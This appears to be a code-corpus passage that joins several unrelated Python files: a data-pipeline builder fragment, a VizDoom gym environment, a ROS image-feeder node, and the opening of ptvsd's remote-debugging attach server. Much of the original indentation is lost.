self._aggregation_buffer = []
class Consumer(object):
def __init__(self, alias):
self._alias = alias
def consume(self, message):
pass
class DataGenerator(object):
def __init__(self):
pass
def produce(self):
"""
have to yield each data to stream into pipeline
:return: any type of data
"""
pass
class PipeBuilder(object):
PIPE_CLS = 'pipe'
ALIAS = 'alias'
CONSUMER = "consumer"
NUMBER_OF_CONSUMER = "number_of_consumer"
BUFFER_SIZE = "buffer_size"
SKIP_ON_ERROR = "skip_on_error"
INBOUND_COUNTER = "inbound_counter"
OUTBOUND_COUNTER = "outbound_counter"
AGGREGATION_SIZE = "aggregation_size"
CONSUMER_EXCEPTION_HANDLER = "consumer_exception_handler"
def __init__(self, alias=None, pipe_cls=DefaultPipe):
self._properties = {}
self.alias(alias)
self.pipe_cls(pipe_cls)
def pipe_cls(self, pipe_cls):
self.set(PipeBuilder.PIPE_CLS, pipe_cls)
return self
def alias(self, alias):
self.set(PipeBuilder.ALIAS, alias)
return self
def consumer(self, consumer):
self.set(PipeBuilder.CONSUMER, consumer)
return self
def number_of_consumer(self, number_of_consumer):
self.set(PipeBuilder.NUMBER_OF_CONSUMER, number_of_consumer)
return self
    def buffer_size(self, buffer_size):
        self.set(PipeBuilder.BUFFER_SIZE, buffer_size)
        return self
def inbound_counter(self, counter):
self.set(PipeBuilder.INBOUND_COUNTER, counter)
return self
def outbound_counter(self, counter):
self.set(PipeBuilder.OUTBOUND_COUNTER, counter)
return self
def aggregation_size(self, aggregation_size):
self.set(PipeBuilder.AGGREGATION_SIZE, aggregation_size)
return self
def consumer_exception_handler(self, consumer_exception_handler):
self.set(PipeBuilder.CONSUMER_EXCEPTION_HANDLER, consumer_exception_handler)
return self
def set(self, attr, value):
self._properties[attr] = value
def get(self, attr):
return self._properties[attr]
def exists(self, attr):
return attr in self._properties
def build(self):
pipe_kwargs = dict(filter(lambda item: item[0] != PipeBuilder.PIPE_CLS, self._properties.items()))
return self._properties[PipeBuilder.PIPE_CLS](**pipe_kwargs)
class ConsumerException(Exception):
def __init__(self,
message=None,
cause=None,
data=None,
stacktrace=None):
self.message = message
self.cause = cause
self.data = data
        self.stacktrace = stacktrace
super(ConsumerException, self).__init__(message, cause, data, stacktrace)
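# Illustrative usage sketch (not part of the original module): builds a two-stage
# pipeline that squares numbers and then batches the results in pairs, and streams
# a small range through it. The implementation above relies on eager map()/filter()
# semantics and fork-based multiprocessing, i.e. Python 2 on a Unix-like system, so
# this sketch is only expected to work in that environment. It is never called here.
def _example_pipeline_usage():
    pipeline = Pipeline(alias="example")
    pipeline.add(PipeBuilder(alias="square").consumer(lambda x: x * x))
    pipeline.add(PipeBuilder(alias="pairs").aggregation_size(2))
    for batch in pipeline.stream(range(6)):
        print(batch)  # expected batches: [0, 1], [4, 9], [16, 25]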
|
doom_gym.py
|
import copy
import os
import random
import re
import time
from os.path import join
from threading import Thread
import cv2
import gym
import numpy as np
from filelock import FileLock, Timeout
from gym.utils import seeding
from vizdoom.vizdoom import ScreenResolution, DoomGame, Mode, AutomapMode
from seed_rl.algorithms.utils.spaces.discretized import Discretized
from seed_rl.utils.utils import log, project_tmp_dir
def doom_lock_file(max_parallel):
"""
Doom instances tend to have problems starting when a lot of them are initialized in parallel.
This is not a problem during normal execution once the envs are initialized.
The "sweet spot" for the number of envs that can be initialized in parallel is about 5-10.
    Here we use a file-locking mechanism to ensure that only a limited number of envs are being
    initialized at the same time. This tends to be more of a problem for multiplayer envs.
    File locks also have the advantage of working across completely independent process groups,
    e.g. different experiments.
"""
lock_filename = f'doom_{random.randrange(0, max_parallel):03d}.lockfile'
tmp_dir = project_tmp_dir()
lock_path = join(tmp_dir, lock_filename)
return lock_path
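# Illustrative sketch (not part of the original module): how doom_lock_file() is
# meant to be combined with FileLock, mirroring the pattern used by
# VizdoomEnv._game_init() further below. `game` is assumed to be an already
# configured DoomGame instance; nothing in this module calls this function.
def _example_throttled_init(game, max_parallel=10):
    lock = FileLock(doom_lock_file(max_parallel))
    try:
        with lock.acquire(timeout=20):
            game.init()
    except Timeout:
        log.debug('Another process currently holds the init lock, retry later')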
def key_to_action_default(key):
"""
MOVE_FORWARD
MOVE_BACKWARD
MOVE_RIGHT
MOVE_LEFT
SELECT_WEAPON1
SELECT_WEAPON2
SELECT_WEAPON3
SELECT_WEAPON4
SELECT_WEAPON5
SELECT_WEAPON6
SELECT_WEAPON7
ATTACK
SPEED
TURN_LEFT_RIGHT_DELTA
"""
from pynput.keyboard import Key
# health gathering
action_table = {
Key.left: 0,
Key.right: 1,
Key.up: 2,
Key.down: 3,
}
# action_table = {
# Key.up: 0,
# Key.down: 1,
# Key.alt: 6,
# Key.ctrl: 11,
# Key.shift: 12,
# Key.space: 13,
# Key.right: 'turn_right',
# Key.left: 'turn_left',
# }
return action_table.get(key, None)
class VizdoomEnv(gym.Env):
def __init__(self,
action_space,
config_file,
coord_limits=None,
max_histogram_length=200,
show_automap=False,
skip_frames=1,
async_mode=False,
record_to=None):
self.initialized = False
# essential game data
self.game = None
self.state = None
self.curr_seed = 0
self.rng = None
self.skip_frames = skip_frames
self.async_mode = async_mode
# optional - for topdown view rendering and visitation heatmaps
self.show_automap = show_automap
self.coord_limits = coord_limits
# can be adjusted after the environment is created (but before any reset() call) via observation space wrapper
self.screen_w, self.screen_h, self.channels = 640, 480, 3
self.screen_resolution = ScreenResolution.RES_640X480
self.calc_observation_space()
self.black_screen = None
# provided as a part of environment definition, since these depend on the scenario and
# can be quite complex multi-discrete spaces
self.action_space = action_space
self.composite_action_space = hasattr(self.action_space, 'spaces')
self.delta_actions_scaling_factor = 7.5
scenarios_dir = join(os.path.dirname(__file__), 'scenarios')
self.config_path = join(scenarios_dir, config_file)
self.variable_indices = self._parse_variable_indices(self.config_path)
# only created if we call render() method
self.viewer = None
# record full episodes using VizDoom recording functionality
self.record_to = record_to
self.is_multiplayer = False # overridden in derived classes
# (optional) histogram to track positional coverage
# do not pass coord_limits if you don't need this, to avoid extra calculation
self.max_histogram_length = max_histogram_length
self.current_histogram, self.previous_histogram = None, None
if self.coord_limits:
x = (self.coord_limits[2] - self.coord_limits[0])
y = (self.coord_limits[3] - self.coord_limits[1])
if x > y:
len_x = self.max_histogram_length
len_y = int((y / x) * self.max_histogram_length)
else:
len_x = int((x / y) * self.max_histogram_length)
len_y = self.max_histogram_length
self.current_histogram = np.zeros((len_x, len_y), dtype=np.int32)
self.previous_histogram = np.zeros_like(self.current_histogram)
# helpers for human play with pynput keyboard input
self._terminate = False
self._current_actions = []
self._actions_flattened = None
self._prev_info = None
self._last_episode_info = None
self._num_episodes = 0
self.mode = 'algo'
self.seed()
def seed(self, seed=None):
self.curr_seed = seeding.hash_seed(seed, max_bytes=4)
self.rng, _ = seeding.np_random(seed=self.curr_seed)
return [self.curr_seed, self.rng]
def calc_observation_space(self):
self.observation_space = gym.spaces.Box(0, 255, (self.screen_h, self.screen_w, self.channels), dtype=np.uint8)
def _set_game_mode(self, mode):
if mode == 'replay':
self.game.set_mode(Mode.PLAYER)
else:
if self.async_mode:
log.info('Starting in async mode! Use this only for testing, otherwise PLAYER mode is much faster')
self.game.set_mode(Mode.ASYNC_PLAYER)
else:
self.game.set_mode(Mode.PLAYER)
def _create_doom_game(self, mode):
self.game = DoomGame()
self.game.load_config(self.config_path)
self.game.set_screen_resolution(self.screen_resolution)
self.game.set_seed(self.rng.randint(0, 2**32 - 1))
if mode == 'algo':
self.game.set_window_visible(False)
elif mode == 'human' or mode == 'replay':
self.game.add_game_args('+freelook 1')
self.game.set_window_visible(True)
else:
raise Exception('Unsupported mode')
self._set_game_mode(mode)
def _game_init(self, with_locking=True, max_parallel=10):
lock_file = lock = None
if with_locking:
lock_file = doom_lock_file(max_parallel)
lock = FileLock(lock_file)
init_attempt = 0
while True:
init_attempt += 1
try:
if with_locking:
with lock.acquire(timeout=20):
self.game.init()
else:
self.game.init()
break
except Timeout:
if with_locking:
log.debug(
'Another process currently holds the lock %s, attempt: %d', lock_file, init_attempt,
)
except Exception as exc:
log.warning('VizDoom game.init() threw an exception %r. Terminate process...', exc)
from seed_rl.envs.env_utils import EnvCriticalError
raise EnvCriticalError()
def initialize(self):
self._create_doom_game(self.mode)
# (optional) top-down view provided by the game engine
if self.show_automap:
self.game.set_automap_buffer_enabled(True)
self.game.set_automap_mode(AutomapMode.OBJECTS)
self.game.set_automap_rotate(False)
self.game.set_automap_render_textures(False)
# self.game.add_game_args("+am_restorecolors")
# self.game.add_game_args("+am_followplayer 1")
background_color = 'ffffff'
self.game.add_game_args('+viz_am_center 1')
self.game.add_game_args('+am_backcolor ' + background_color)
self.game.add_game_args('+am_tswallcolor dddddd')
# self.game.add_game_args("+am_showthingsprites 0")
self.game.add_game_args('+am_yourcolor ' + background_color)
self.game.add_game_args('+am_cheat 0')
self.game.add_game_args('+am_thingcolor 0000ff') # player color
self.game.add_game_args('+am_thingcolor_item 00ff00')
# self.game.add_game_args("+am_thingcolor_citem 00ff00")
self._game_init()
self.initialized = True
def _ensure_initialized(self):
if not self.initialized:
self.initialize()
@staticmethod
def _parse_variable_indices(config):
with open(config, 'r') as config_file:
lines = config_file.readlines()
lines = [l.strip() for l in lines]
variable_indices = {}
for line in lines:
if line.startswith('#'):
continue # comment
variables_syntax = r'available_game_variables[\s]*=[\s]*\{(.*)\}'
match = re.match(variables_syntax, line)
if match is not None:
variables_str = match.groups()[0]
variables_str = variables_str.strip()
variables = variables_str.split(' ')
for i, variable in enumerate(variables):
variable_indices[variable] = i
break
return variable_indices
def _black_screen(self):
if self.black_screen is None:
self.black_screen = np.zeros(self.observation_space.shape, dtype=np.uint8)
return self.black_screen
def _game_variables_dict(self, state):
game_variables = state.game_variables
variables = {}
for variable, idx in self.variable_indices.items():
variables[variable] = game_variables[idx]
return variables
def demo_path(self, episode_idx):
demo_name = f'e{episode_idx:03d}.lmp'
demo_path = join(self.record_to, demo_name)
demo_path = os.path.normpath(demo_path)
return demo_path
def reset(self):
self._ensure_initialized()
if self.record_to is not None and not self.is_multiplayer:
# does not work in multiplayer (uses different mechanism)
if not os.path.exists(self.record_to):
os.makedirs(self.record_to)
demo_path = self.demo_path(self._num_episodes)
log.warning('Recording episode demo to %s', demo_path)
self.game.new_episode(demo_path)
else:
if self._num_episodes > 0:
# no demo recording (default)
self.game.new_episode()
self.state = self.game.get_state()
img = None
try:
img = self.state.screen_buffer
except AttributeError:
# sometimes Doom does not return screen buffer at all??? Rare bug
pass
if img is None:
log.error('Game returned None screen buffer! This is not supposed to happen!')
img = self._black_screen()
# Swap current and previous histogram
if self.current_histogram is not None and self.previous_histogram is not None:
swap = self.current_histogram
self.current_histogram = self.previous_histogram
self.previous_histogram = swap
self.current_histogram.fill(0)
self._actions_flattened = None
self._last_episode_info = copy.deepcopy(self._prev_info)
self._prev_info = None
self._num_episodes += 1
return np.transpose(img, (1, 2, 0))
def _convert_actions(self, actions):
"""Convert actions from gym action space to the action space expected by Doom game."""
if self.composite_action_space:
# composite action space with multiple subspaces
spaces = self.action_space.spaces
else:
# simple action space, e.g. Discrete. We still treat it like composite of length 1
spaces = (self.action_space, )
actions = (actions, )
actions_flattened = []
for i, action in enumerate(actions):
if isinstance(spaces[i], Discretized):
# discretized continuous action
# check discretized first because it's a subclass of gym.spaces.Discrete
# the order of if clauses here matters! DON'T CHANGE THE ORDER OF IFS!
continuous_action = spaces[i].to_continuous(action)
actions_flattened.append(continuous_action)
elif isinstance(spaces[i], gym.spaces.Discrete):
# standard discrete action
num_non_idle_actions = spaces[i].n - 1
action_one_hot = np.zeros(num_non_idle_actions, dtype=np.uint8)
if action > 0:
action_one_hot[action - 1] = 1 # 0th action in each subspace is a no-op
actions_flattened.extend(action_one_hot)
elif isinstance(spaces[i], gym.spaces.Box):
# continuous action
actions_flattened.extend(list(action * self.delta_actions_scaling_factor))
else:
raise NotImplementedError(f'Action subspace type {type(spaces[i])} is not supported!')
return actions_flattened
def _vizdoom_variables_bug_workaround(self, info, done):
"""Some variables don't get reset to zero on game.new_episode(). This fixes it (also check overflow?)."""
if done and 'DAMAGECOUNT' in info:
log.info('DAMAGECOUNT value on done: %r', info.get('DAMAGECOUNT'))
if self._last_episode_info is not None:
bugged_vars = ['DEATHCOUNT', 'HITCOUNT', 'DAMAGECOUNT']
for v in bugged_vars:
if v in info:
info[v] -= self._last_episode_info.get(v, 0)
def _process_game_step(self, state, done, info):
if not done:
observation = np.transpose(state.screen_buffer, (1, 2, 0))
game_variables = self._game_variables_dict(state)
info.update(self.get_info(game_variables))
self._update_histogram(info)
self._prev_info = copy.deepcopy(info)
else:
observation = self._black_screen()
# when done=True Doom does not allow us to call get_info, so we provide info from the last frame
info.update(self._prev_info)
self._vizdoom_variables_bug_workaround(info, done)
return observation, done, info
def step(self, actions):
"""
Action is either a single value (discrete, one-hot), or a tuple with an action for each of the
discrete action subspaces.
"""
if self._actions_flattened is not None:
# provided externally, e.g. via human play
actions_flattened = self._actions_flattened
self._actions_flattened = None
else:
actions_flattened = self._convert_actions(actions)
default_info = {'num_frames': self.skip_frames}
reward = self.game.make_action(actions_flattened, self.skip_frames)
state = self.game.get_state()
done = self.game.is_episode_finished()
observation, done, info = self._process_game_step(state, done, default_info)
return observation, reward, done, info
def render(self, mode='human'):
try:
img = self.game.get_state().screen_buffer
img = np.transpose(img, [1, 2, 0])
if mode == 'rgb_array':
return img
h, w = img.shape[:2]
render_w = 1280
if w < render_w:
render_h = int(render_w * h / w)
img = cv2.resize(img, (render_w, render_h))
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer(maxwidth=render_w)
self.viewer.imshow(img)
return img
except AttributeError:
return None
def close(self):
try:
if self.game is not None:
self.game.close()
except RuntimeError as exc:
log.warning('Runtime error in VizDoom game close(): %r', exc)
if self.viewer is not None:
self.viewer.close()
def get_info(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info_dict = {'pos': self.get_positions(variables)}
info_dict.update(variables)
return info_dict
def get_info_all(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info = self.get_info(variables)
if self.previous_histogram is not None:
info['previous_histogram'] = self.previous_histogram
return info
def get_positions(self, variables):
return self._get_positions(variables)
@staticmethod
def _get_positions(variables):
have_coord_data = True
required_vars = ['POSITION_X', 'POSITION_Y', 'ANGLE']
for required_var in required_vars:
if required_var not in variables:
have_coord_data = False
break
x = y = a = np.nan
if have_coord_data:
x = variables['POSITION_X']
y = variables['POSITION_Y']
a = variables['ANGLE']
return {'agent_x': x, 'agent_y': y, 'agent_a': a}
def get_automap_buffer(self):
if self.game.is_episode_finished():
return None
state = self.game.get_state()
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
return map_
def _update_histogram(self, info, eps=1e-8):
if self.current_histogram is None:
return
agent_x, agent_y = info['pos']['agent_x'], info['pos']['agent_y']
# Get agent coordinates normalized to [0, 1]
dx = (agent_x - self.coord_limits[0]) / (self.coord_limits[2] - self.coord_limits[0])
dy = (agent_y - self.coord_limits[1]) / (self.coord_limits[3] - self.coord_limits[1])
# Rescale coordinates to histogram dimensions
# Subtract eps to exclude upper bound of dx, dy
dx = int((dx - eps) * self.current_histogram.shape[0])
dy = int((dy - eps) * self.current_histogram.shape[1])
self.current_histogram[dx, dy] += 1
def _key_to_action(self, key):
if hasattr(self.action_space, 'key_to_action'):
return self.action_space.key_to_action(key)
else:
return key_to_action_default(key)
def _keyboard_on_press(self, key):
from pynput.keyboard import Key
if key == Key.esc:
self._terminate = True
return False
action = self._key_to_action(key)
if action is not None:
if action not in self._current_actions:
self._current_actions.append(action)
def _keyboard_on_release(self, key):
action = self._key_to_action(key)
if action is not None:
if action in self._current_actions:
self._current_actions.remove(action)
# noinspection PyProtectedMember
@staticmethod
def play_human_mode(env, skip_frames=1, num_episodes=3, num_actions=None):
from pynput.keyboard import Listener
doom = env.unwrapped
doom.skip_frames = 1 # handled by this script separately
# noinspection PyProtectedMember
def start_listener():
with Listener(on_press=doom._keyboard_on_press, on_release=doom._keyboard_on_release) as listener:
listener.join()
listener_thread = Thread(target=start_listener)
listener_thread.start()
for episode in range(num_episodes):
doom.mode = 'human'
env.reset()
last_render_time = time.time()
time_between_frames = 1.0 / 35.0
total_rew = 0.0
while not doom.game.is_episode_finished() and not doom._terminate:
num_actions = 14 if num_actions is None else num_actions
turn_delta_action_idx = num_actions - 1
actions = [0] * num_actions
for action in doom._current_actions:
if isinstance(action, int):
actions[action] = 1 # 1 for buttons currently pressed, 0 otherwise
else:
if action == 'turn_left':
actions[turn_delta_action_idx] = -doom.delta_actions_scaling_factor
elif action == 'turn_right':
actions[turn_delta_action_idx] = doom.delta_actions_scaling_factor
for frame in range(skip_frames):
doom._actions_flattened = actions
_, rew, _, _ = env.step(actions)
new_total_rew = total_rew + rew
if new_total_rew != total_rew:
log.info('Reward: %.3f, total: %.3f', rew, new_total_rew)
total_rew = new_total_rew
state = doom.game.get_state()
verbose = True
if state is not None and verbose:
info = doom.get_info()
print(
'Health:', info['HEALTH'],
# 'Weapon:', info['SELECTED_WEAPON'],
# 'ready:', info['ATTACK_READY'],
# 'ammo:', info['SELECTED_WEAPON_AMMO'],
# 'pc:', info['PLAYER_COUNT'],
# 'dmg:', info['DAMAGECOUNT'],
)
time_since_last_render = time.time() - last_render_time
time_wait = time_between_frames - time_since_last_render
if doom.show_automap and state.automap_buffer is not None:
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
cv2.imshow('ViZDoom Automap Buffer', map_)
if time_wait > 0:
                        cv2.waitKey(int(time_wait * 1000))
else:
if time_wait > 0:
time.sleep(time_wait)
last_render_time = time.time()
if doom.show_automap:
cv2.destroyAllWindows()
log.debug('Press ESC to exit...')
listener_thread.join()
# noinspection PyProtectedMember
@staticmethod
def replay(env, rec_path):
doom = env.unwrapped
doom.mode = 'replay'
doom._ensure_initialized()
doom.game.replay_episode(rec_path)
episode_reward = 0
start = time.time()
while not doom.game.is_episode_finished():
doom.game.advance_action()
r = doom.game.get_last_reward()
episode_reward += r
log.info('Episode reward: %.3f, time so far: %.1f s', episode_reward, time.time() - start)
log.info('Finishing replay')
doom.close()
|
image_feeder.py
|
#!/usr/bin/env python
import os
import sys
import glob
import rospy
import re
import json
import cv2
import threading
import numpy as np
from cv_bridge import CvBridge
from sensor_msgs import msg as smsg
from geometry_msgs import msg as gmsg
from aist_depth_filter import DepthFilterClient
from tf import TransformBroadcaster, transformations as tfs
#########################################################################
#                            global functions                           #
#########################################################################
def transform_from_plane(plane):
def normalize(v):
return v / np.linalg.norm(v)
t = gmsg.TransformStamped()
t.header.frame_id = plane.header.frame_id
t.child_frame_id = "tray_center"
# Compute translation
k = np.array([plane.plane.normal.x, plane.plane.normal.y, plane.plane.normal.z])
x = -plane.plane.distance * k
t.transform.translation.x = x[0]
t.transform.translation.y = x[1]
t.transform.translation.z = x[2]
# Compute rotation
j = normalize(np.cross(k, np.array([1, 0, 0])))
i = np.cross(j, k)
q = tfs.quaternion_from_matrix(
np.array(
[
[i[0], j[0], k[0], 0.0],
[i[1], j[1], k[1], 0.0],
[i[2], j[2], k[2], 0.0],
[0.0, 0.0, 0.0, 1.0],
]
)
)
t.transform.rotation.x = q[0]
t.transform.rotation.y = q[1]
t.transform.rotation.z = q[2]
t.transform.rotation.w = q[3]
return t
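# Note (illustrative comments, not part of the original script): the transform
# built above places the "tray_center" frame at the point on the detected plane
# closest to the camera origin (translation = -distance * normal, assuming the
# usual n.p + d = 0 plane convention) and orients it so that the plane normal
# becomes the local z-axis, with the x- and y-axes obtained via cross products
# to form a right-handed basis.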
#########################################################################
# class ImageFeeder #
#########################################################################
class ImageFeeder(object):
"""
Supplies images from the annotation database to the recognition pipeline.
Used for testing the pipeline without using a camera or robot.
"""
def __init__(self, data_dir):
super(ImageFeeder, self).__init__()
self._data_dir = data_dir
# Load camera intrinsics
filename = rospy.get_param("~intrinsic", "realsense_intrinsic.json")
with open(self._data_dir + "/" + filename) as f:
try:
intrinsic = json.loads(f.read())
except Exception as e:
rospy.logerr("(Feeder) %s", str(e))
Kt = intrinsic["intrinsic_matrix"]
K = [Kt[0], Kt[3], Kt[6], Kt[1], Kt[4], Kt[7], Kt[2], Kt[5], Kt[8]]
self._cinfo = smsg.CameraInfo()
self._cinfo.header.frame_id = rospy.get_param("~camera_frame", "map")
self._cinfo.height = intrinsic["height"]
self._cinfo.width = intrinsic["width"]
self._cinfo.distortion_model = "plumb_bob"
self._cinfo.D = [0, 0, 0, 0, 0]
self._cinfo.K = K
self._cinfo.R = [1, 0, 0, 0, 1, 0, 0, 0, 1]
self._cinfo.P = K[0:3] + [0] + K[3:6] + [0] + K[6:9] + [0]
self._cinfo.binning_x = 0
self._cinfo.binning_y = 0
self._cinfo_pub = rospy.Publisher("~camera_info", smsg.CameraInfo, queue_size=1)
self._image_pub = rospy.Publisher("~image", smsg.Image, queue_size=1)
self._depth_pub = rospy.Publisher("~depth", smsg.Image, queue_size=1)
self._dfilter = DepthFilterClient("depth_filter")
self._broadcaster = TransformBroadcaster()
self._transform = None
self._image = None
self._depth = None
self._run = True
thread = threading.Thread(target=self._stream_image)
thread.start()
    def stream_image(self, annotation_filename):
try:
f = open(annotation_filename)
annotation = json.loads(f.read())
image = cv2.imread(
self._data_dir + "/Annotations/" + annotation["img_path"],
cv2.IMREAD_COLOR,
)
depth = cv2.imread(
self._data_dir + "/Annotations/" + annotation["depth_path"],
cv2.IMREAD_UNCHANGED,
)
self._image = CvBridge().cv2_to_imgmsg(image, encoding="bgr8")
self._depth = CvBridge().cv2_to_imgmsg(depth)
self._transform = None
except Exception as e:
rospy.logerr("(Feeder) %s(annotation = %s)", str(e), annotation_filename)
def quit(self):
self._run = False
def _stream_image(self):
rate = rospy.Rate(10) # 10Hz
while self._run:
if self._image and self._depth:
if self._transform is None:
self._dfilter.detect_plane_send_goal()
now = rospy.Time.now()
self._cinfo.header.stamp = now
self._image.header = self._cinfo.header
self._depth.header = self._cinfo.header
self._cinfo_pub.publish(self._cinfo)
self._image_pub.publish(self._image)
self._depth_pub.publish(self._depth)
if self._transform is None:
plane = self._dfilter.detect_plane_wait_for_result()
if plane is not None:
self._transform = transform_from_plane(plane)
if self._transform is not None:
self._transform.header.stamp = now
self._broadcaster.sendTransformMessage(self._transform)
rate.sleep()
#########################################################################
# main #
#########################################################################
if __name__ == "__main__":
rospy.init_node("~")
data_dir = os.path.expanduser(rospy.get_param("~data_dir", "~/data/WRS_Dataset"))
feeder = ImageFeeder(data_dir)
while not rospy.is_shutdown():
datasets = ("Far", "Close")
for dataset in datasets:
annotation_filenames = glob.glob(
data_dir + "/Annotations/" + dataset + "/Image-wise/*.json"
)
for annotation_filename in annotation_filenames:
rospy.loginfo("*** (Feeder) ==================")
rospy.loginfo("*** (Feeder) annotation: %s", annotation_filename)
feeder.stream_image(annotation_filename)
if raw_input("Hit return key >> ") == "q":
feeder.quit()
sys.exit()
|
attach_server.py
|
# ############################################################################
#
# Copyright (c) Microsoft Corporation.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# vspython@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
# ###########################################################################
__all__ = ['enable_attach', 'wait_for_attach', 'break_into_debugger', 'settrace', 'is_attached', 'AttachAlreadyEnabledError']
import atexit
import getpass
import os
import os.path
import platform
import socket
import struct
import sys
import threading
try:
import thread
except ImportError:
import _thread as thread
try:
import ssl
except ImportError:
ssl = None
import ptvsd.visualstudio_py_debugger as vspd
import ptvsd.visualstudio_py_repl as vspr
from ptvsd.visualstudio_py_util import to_bytes, read_bytes, read_int, read_string, write_bytes, write_int, write_string
# The server (i.e. the Python app) waits on a TCP port provided. Whenever anything connects to that port,
# it immediately sends the octet sequence 'PTVSDBG', followed by version number represented as int64,
# and then waits for the client to respond with the same exact byte sequence. After signatures are thereby
# exchanged and found to match, the client is expected to provide a string secret (in the usual debugger
# string format, None/ASCII/Unicode prefix + length + data), which can be an empty string to designate the
# lack of a specified secret.
#
# If the secret does not match the one expected by the server, it responds with 'RJCT', and then closes
# the connection. Otherwise, the server responds with 'ACPT', and awaits a 4-octet command. The following
# commands are recognized:
#
# 'INFO'
# Report information about the process. The server responds with the following information, in order:
# - Process ID (int64)
# - Executable name (string)
# - User name (string)
# - Implementation name (string)
# and then immediately closes connection. Note, all string fields can be empty or null strings.
#
# 'ATCH'
# Attach debugger to the process. If successful, the server responds with 'ACPT', followed by process ID
# (int64), and then the Python language version that the server is running represented by three int64s -
# major, minor, micro; From there on the socket is assumed to be using the normal PTVS debugging protocol.
# If attaching was not successful (which can happen if some other debugger is already attached), the server
# responds with 'RJCT' and closes the connection.
#
# 'REPL'
# Attach REPL to the process. If successful, the server responds with 'ACPT', and from there on the socket
# is assumed to be using the normal PTVS REPL protocol. If not successful (which can happen if there is
# no debugger attached), the server responds with 'RJCT' and closes the connection.
PTVS_VER = '2.2'
DEFAULT_PORT = 5678
PTVSDBG_VER = 6 # must be kept in sync with DebuggerProtocolVersion in PythonRemoteProcess.cs
PTVSDBG = to_bytes('PTVSDBG')
ACPT = to_bytes('ACPT')
RJCT = to_bytes('RJCT')
INFO = to_bytes('INFO')
ATCH = to_bytes('ATCH')
REPL = to_bytes('REPL')
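# Illustrative sketch (not part of the original module): a minimal client-side
# handshake for the 'INFO' command described in the protocol notes above, reusing
# the same byte-level helpers the server uses. Provided for documentation only;
# nothing in this module calls it.
def _example_info_client(host, port, secret=''):
    s = socket.create_connection((host, port))
    try:
        # The server speaks first: signature followed by the protocol version.
        if read_bytes(s, 7) != PTVSDBG or read_int(s) != PTVSDBG_VER:
            return None
        # Echo the signature/version back and present the shared secret.
        write_bytes(s, PTVSDBG)
        write_int(s, PTVSDBG_VER)
        write_string(s, secret)
        if read_bytes(s, 4) != ACPT:
            return None  # secret rejected ('RJCT'), server closes the connection
        # Ask for process information and read the four fields in order.
        write_bytes(s, INFO)
        pid = read_int(s)
        exe = read_string(s)
        user = read_string(s)
        version = read_string(s)
        return pid, exe, user, version
    finally:
        s.close()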
_attach_enabled = False
_attached = threading.Event()
vspd.DONT_DEBUG.append(os.path.normcase(__file__))
class AttachAlreadyEnabledError(Exception):
"""`ptvsd.enable_attach` has already been called in this process."""
def enable_attach(secret, address = ('0.0.0.0', DEFAULT_PORT), certfile = None, keyfile = None, redirect_output = True):
"""Enables Python Tools for Visual Studio to attach to this process remotely
to debug Python code.
Parameters
----------
secret : str
Used to validate the clients - only those clients providing the valid
secret will be allowed to connect to this server. On client side, the
secret is prepended to the Qualifier string, separated from the
hostname by ``'@'``, e.g.: ``'secret@myhost.cloudapp.net:5678'``. If
secret is ``None``, there's no validation, and any client can connect
freely.
address : (str, int), optional
Specifies the interface and port on which the debugging server should
listen for TCP connections. It is in the same format as used for
regular sockets of the `socket.AF_INET` family, i.e. a tuple of
``(hostname, port)``. On client side, the server is identified by the
Qualifier string in the usual ``'hostname:port'`` format, e.g.:
``'myhost.cloudapp.net:5678'``. Default is ``('0.0.0.0', 5678)``.
certfile : str, optional
Used to enable SSL. If not specified, or if set to ``None``, the
connection between this program and the debugger will be unsecure,
and can be intercepted on the wire. If specified, the meaning of this
parameter is the same as for `ssl.wrap_socket`.
keyfile : str, optional
Used together with `certfile` when SSL is enabled. Its meaning is the
same as for ``ssl.wrap_socket``.
redirect_output : bool, optional
Specifies whether any output (on both `stdout` and `stderr`) produced
by this program should be sent to the debugger. Default is ``True``.
Notes
-----
This function returns immediately after setting up the debugging server,
and does not block program execution. If you need to block until debugger
is attached, call `ptvsd.wait_for_attach`. The debugger can be detached
and re-attached multiple times after `enable_attach` is called.
This function can only be called once during the lifetime of the process.
On a second call, `AttachAlreadyEnabledError` is raised. In circumstances
where the caller does not control how many times the function will be
called (e.g. when a script with a single call is run more than once by
a hosting app or framework), the call should be wrapped in ``try..except``.
Only the thread on which this function is called, and any threads that are
created after it returns, will be visible in the debugger once it is
attached. Any threads that are already running before this function is
called will not be visible.
"""
if not ssl and (certfile or keyfile):
raise ValueError('could not import the ssl module - SSL is not supported on this version of Python')
if sys.platform == 'cli':
# Check that IronPython was launched with -X:Frames and -X:Tracing, since we can't register our trace
# func on the thread that calls enable_attach otherwise
import clr
x_tracing = clr.GetCurrentRuntime().GetLanguageByExtension('py').Options.Tracing
x_frames = clr.GetCurrentRuntime().GetLanguageByExtension('py').Options.Frames
if not x_tracing or not x_frames:
raise RuntimeError('IronPython must be started with -X:Tracing and -X:Frames options to support PTVS remote debugging.')
global _attach_enabled
if _attach_enabled:
raise AttachAlreadyEnabledError('ptvsd.enable_attach() has already been called in this process.')
_attach_enabled = True
atexit.register(vspd.detach_process_and_notify_debugger)
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(address)
server.listen(1)
def server_thread_func():
while True:
client = None
raw_client = None
try:
client, addr = server.accept()
if certfile:
client = ssl.wrap_socket(client, server_side = True, ssl_version = ssl.PROTOCOL_TLSv1, certfile = certfile, keyfile = keyfile)
write_bytes(client, PTVSDBG)
write_int(client, PTVSDBG_VER)
response = read_bytes(client, 7)
if response != PTVSDBG:
continue
dbg_ver = read_int(client)
if dbg_ver != PTVSDBG_VER:
continue
client_secret = read_string(client)
if secret is None or secret == client_secret:
write_bytes(client, ACPT)
else:
write_bytes(client, RJCT)
continue
response = read_bytes(client, 4)
if response == INFO:
try:
pid = os.getpid()
except AttributeError:
pid = 0
write_int(client, pid)
exe = sys.executable or ''
write_string(client, exe)
